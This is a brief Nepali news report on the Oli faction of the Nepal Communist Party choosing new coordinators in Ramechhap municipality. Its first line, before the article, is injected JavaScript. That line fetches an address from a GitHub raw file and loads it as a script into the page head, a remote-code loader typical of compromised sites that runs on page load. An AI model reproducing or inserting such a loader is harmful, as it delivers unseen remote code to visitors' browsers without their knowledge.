;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ ०९,
रामेछाप । नेपाल कम्युनिष्ट पार्टी (नेकपा) ओली समुह रामेछाप नगरको संयोजकमा डेग बहादुर तामाङ चयन भएका छन् । यसअघिका अध्यक्ष मोती तामाङ र सचिब होतराज ढकाललाई हटाएर उनीरुलाई चयन गरेको हो । तर सदस्यताबाट भने नहटाएको अनेरास्वबियूका जिल्ला कमिटी सचिवालय सदस्य पुष्कट भट्टराईले जुनेली न्युजलाई बताए ।
शुक्रबार भएको सो समुहको नगर संगठन कमिटीको बैठक तथा भेलाले तामाङलाई संयोजकको जिम्मेवारी दिएको हो ।
त्यस्यै सह-संयोजकमा निलकण्ठ ढकाल र सचिवमा सुन्दर घिमिरे चयन भएका छन् । उनीहरुलाई पार्टीका केन्द्रीय सदस्य माधव ढुङ्गेलले समुहलाई चलायमान बनाउन निर्देशन दिएका छन् ।
समुहले शुक्रबार बृहत जनसभा आयोजना गरेको थियो ।
फोटो पुष्कर भट्टराई नेता ओली समुहबाट साभार
फेसबुक प्रतिक्रियाहरु